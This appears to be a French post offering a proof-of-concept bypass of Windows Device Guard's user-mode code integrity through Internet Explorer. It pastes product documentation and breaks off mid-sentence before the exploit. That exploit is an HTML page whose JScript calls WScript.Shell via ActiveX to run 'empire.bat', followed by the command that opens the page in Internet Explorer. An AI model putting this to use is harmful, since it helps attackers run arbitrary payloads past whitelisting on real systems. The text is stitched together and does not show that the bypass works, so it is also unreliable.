
Exploit de preuve de concept démontrant le contournement d'UMCI dans Internet Explorer à l'aide de JScript et ActiveX pour exécuter des binaires arbitraires, ciblant les stratégies d'intégrité du code de Windows Device Guard.
Windows Defender Device Guard est une combinaison de fonctionnalités de sécurité matérielles et logicielles destinées aux entreprises qui, lorsqu'elles sont configurées ensemble, verrouillent un appareil afin qu'il ne puisse exécuter que les applications approuvées que vous définissez dans vos stratégies d'intégrité du code. Si l'application n'est pas approuvée, elle ne peut pas s'exécuter, point final. Avec un matériel répondant aux exigences de base, cela signifie également que même si un attaquant parvient à prendre le contrôle du noyau Windows, il sera beaucoup moins susceptible de pouvoir exécuter du code exécutable malveillant. Avec le matériel approprié, Windows Defender Device Guard peut utiliser la nouvelle sécurité basée sur la virtualisation de Windows 10 (disponible dans les éditions de bureau Enterprise et Education et dans toutes les éditions Server) pour isoler le service d'intégrité du code du noyau Microsoft Windows lui-même. Dans ce cas, le service d'intégrité du code s'exécute aux côtés du noyau dans un conteneur protégé par l'hyperviseur Windows. Ce guide explore les fonctionnalités individuelles de Windows Defender Device Guard ainsi que la manière de les planifier, de les configurer et de les déployer. Il comprend :
UMCI empêche l'exécution de binaires non approuvés, restreint l'hôte de scripts Windows et place PowerShell en mode de langage contraint. Cela rend l'obtention d'une exécution de code sur un système assez difficile. Ce billet va
======================================================================||>
Allons-y pour une démonstration de contournement de code
======================================================================||>
<html>
<body>
<script type="text/jscript">
var r = new ActiveXObject("WScript.Shell").Run("empire.bat");
</script>
</body>
</html>
======================================================================||>
PS:> C:\Users\Homjxie> cmd /C "C:\Program Files\Internet Explorer\iexplore.exe " "C:\Users\Homjxie\Desktop\Homjxie.html"
======================================================================||>

======================================================================||> ======================================================================||>